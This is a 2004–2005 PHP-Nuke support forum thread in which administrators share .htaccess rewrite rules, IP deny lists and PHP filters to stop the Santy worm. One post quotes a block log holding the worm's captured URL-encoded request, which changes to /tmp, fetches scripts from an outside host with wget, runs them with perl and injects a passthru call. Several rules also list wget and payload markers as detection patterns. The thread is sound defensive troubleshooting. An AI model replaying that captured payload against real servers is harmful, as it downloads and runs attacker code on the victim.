| Author |
Message |
yaanno
New Member
Joined: Dec 29, 2004
Posts: 2
|
 Posted:
Wed Dec 29, 2004 4:40 am |
|
Hia all,
Perhaps we could redirect all queries containin' the "http://" string in a way:
#variant-5 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
sorry for my bad english guys 
yaanno |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Wed Dec 29, 2004 7:51 am |
|
Your English is fine That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution! |
| |
|
|
|
|
yaanno
|
| Posted:
Wed Dec 29, 2004 8:05 am |
|
| Raven wrote: | | Your English is fine That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution! |
Thanks Raven,
Unfortunately these solutions doesn't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? poor guys 
My journal currently run under nuke 5.6 (oh my god! ) and broken down by this worm. So i did a hack in my mainfile.php in this way:
foreach ($HTTP_GET_VARS as $secvalue)
{
if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
{
die ("I don't like you...");
}
elseif (eregi("http", $secvalue))
{
die ("Don't bother me...");
}
elseif (eregi("cd", $secvalue))
{
die ("Go away...");
}
elseif (eregi("cd /tmp;wget", $secvalue))
{
die ("I call the FBI...");
}
}
Cheers and happy Worm-ending Year,
yaanno |
| |
|
|
|
|
Raven
|
| Posted:
Wed Dec 29, 2004 8:10 am |
|
Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one  |
| |
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Mon Jan 03, 2005 11:07 am |
|
LWP::Simple and lwp-trivial STILL getting thru on my site.
my htaccess:
from the top:
Code:RewriteEngine on
RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]
RewriteCond %{REQUEST_URI} ^civa[NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]
|
the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!
I also placed this in my header.php file.
Code:if (strpos($HTTP_USER_AGENT, 'LWP::Simple') > 0) {
exit;
};
if (strpos($HTTP_USER_AGENT, 'lwp-trivial') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'myhost.gb.com') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'mall.uk.net') > 0) {
exit;
};
|
|
| |
|
|
|
|
Raven
|
| Posted:
Mon Jan 03, 2005 11:49 am |
|
Replace ALL your lwp code with one line:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC] |
| |
|
|
|
|
cprompt
|
| Posted:
Tue Jan 04, 2005 9:19 am |
|
I made your advised change raven and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple
| Quote: | Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: www.mysite.com/index.php?t=14&rush=
%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET |
|
| |
|
|
|
|
Raven
|
| Posted:
Tue Jan 04, 2005 9:48 am |
|
Post your .htaccess. I know this works. Something is wrong but it's not that code. |
| |
|
|
|
|
cprompt
|
| Posted:
Tue Jan 04, 2005 9:52 am |
|
Code:RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ www.wildandcrazystuff.com [L]
PHP_FLAG output_buffering on
deny from 148.244.150.52
deny from 200.106.110.236
deny from 200.181.83.243
deny from 219.95.196.80
deny from 68.60.213.202
deny from 200.181.83.243
deny from 148.244.150.52
deny from 219.95.196.80
deny from 200.72.173.120
deny from 209.237.238.181
deny from 192.168.163.167
deny from 68.98.231.137
deny from 82.160.30.194
deny from 81.215.255.48
deny from 67.165.48.29
deny from 209.13.239.235
deny from 66.82.9.54
deny from 209.237.238.180
deny from 200.64.54.223
deny from 212.200.53.61
deny from 81.214.57.246
deny from 211.157.36.6
deny from 211.157.36.4
deny from 12.175.0.35
deny from 203.162.44.73
deny from 213.103.65.23
deny from 10.90.24.11
deny from 80.132.120.148
deny from 209.237.238.166
deny from 213.103.194.140
deny from 217.220.100.158
deny from 207.230.138.240
deny from 208.180.220.197
deny from 66.69.165.44
deny from 213.103.212.15
deny from 81.15.156.33
deny from 203.203.82.241
deny from 212.244.141.2
deny from 202.58.199.241
deny from 132.249.20.69
deny from 195.151.252.177
deny from 195.151.101.150
deny from 217.23.241.101
deny from 64.86.231.98
deny from 210.177.248.65
deny from 12.170.99.234
deny from 67.131.119.83
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.50.42
deny from 66.98.250.82
|
|
| |
|
|
|
|
Raven
|
| Posted:
Tue Jan 04, 2005 9:59 am |
|
You aren't usinh [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.
Code:RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ www.wildandcrazystuff.com [L]
|
|
| |
|
|
|
|
cprompt
|
| Posted:
Tue Jan 04, 2005 10:06 am |
|
thanks raven I'll give that a try. Thanks for your patience. |
| |
|
|
|
|
ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
|
| Posted:
Thu Mar 03, 2005 2:41 am |
|
I've tried your code in the .htaccess file, but I still get emails such as this one:
here's my .htaccess. could you tell me what's wrong:
Code:# $Author: zx $
# $Date: 2003/08/17 14:03:21 $
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>
<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>
<Files 403.shtml>
order allow,deny
allow from all
</Files>
deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248
|
|
| |
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
|
| Posted:
Thu Mar 03, 2005 7:50 am |
|
Try this instead:
Find:
Code:#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
|
And replace with:
Code:RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
|
That pretty much covers mine. |
_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. |
|
|
|
|
ring_c
|
| Posted:
Thu Mar 03, 2005 4:34 pm |
|
Thanks alot. updated.
Now we'll see if more emails are coming in...
thanks again! |
| |
|
|
|
|
ring_c
|
| Posted:
Fri Mar 04, 2005 2:26 am |
|
Yet, no go! 
here's one of three email I got today:
HELP!!!!!!!!!!!! |
| |
|
|
|
|
Raven
|
| Posted:
Fri Mar 04, 2005 2:37 am |
|
ring_c, do you have this line in your .htaccess?
RewriteEngine on |
| |
|
|
|
|
ring_c
|
| Posted:
Fri Mar 04, 2005 2:43 am |
|
| Raven wrote: | ring_c, do you have this line in your .htaccess?
RewriteEngine on |
Nope...
Here's my current .htaccess:
Code:# $Author: zx $
# $Date: 2003/08/17 14:03:21 $
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>
<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>
<Files 403.shtml>
order allow,deny
allow from all
</Files>
|
Anything??? |
| |
|
|
|
|
Raven
|
| Posted:
Fri Mar 04, 2005 3:36 am |
|
 Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be |
| |
|
|
|
|
ring_c
|
| Posted:
Fri Mar 04, 2005 4:15 am |
|
| Quote: |
Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be
|
Oops... how have I missed that?!
Just a sec.... is mod_rewrite a modudle I need to install with my phpnuke or something? |
| |
|
|
|
|
Raven
|
| Posted:
Fri Mar 04, 2005 4:23 am |
|
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed. |
| |
|
|
|
|
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
|
| Posted:
Fri Mar 04, 2005 5:05 am |
|
| Raven wrote: | Without that line, mod_rewrite isn't turned on.
Therefore, it won't work. look at the examples above to see how it's
supposed to be |
True! Generally speaking, rewrite configurations are not inherited, even
though the conditions, rules, et cetera are. So, I always add this line (once)
at the top of all my .htaccess file[s] just to play it safe... |
_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: Only registered users can see links on this board! Get registered or login! | Only registered users can see links on this board! Get registered or login! ::. |
|
 |
|
ring_c
|
| Posted:
Fri Mar 04, 2005 6:20 am |
|
| Quote: |
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.
|
I don't have access to the shell (command prompt).
Is there any other way to tell? |
| |
|
|
|
|
ring_c
|
| Posted:
Fri Mar 04, 2005 6:25 am |
|
Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found that:
Under configuration/Standard there's a table. the relevant line says:
Directove: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=
Is that ok? |
| |
|
|
|
|
Raven
|
| Posted:
Fri Mar 04, 2005 7:34 am |
|
You don't need a shell anyway. Just save this script to a file and run it:
Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listedCode:mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
|
|
| |
|
|
|
|
ring_c
|
| Posted:
Fri Mar 04, 2005 8:07 am |
|
| Raven wrote: | You don't need a shell anyway. Just save this script to a file and run it:
Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listedCode:mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
|
|
Thanks, done that and it seems to be the exact page my host supplied before. Yet, no mod_rewrite anywhere on that page.
Couldn't also find any "Loaded Modules" there. |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
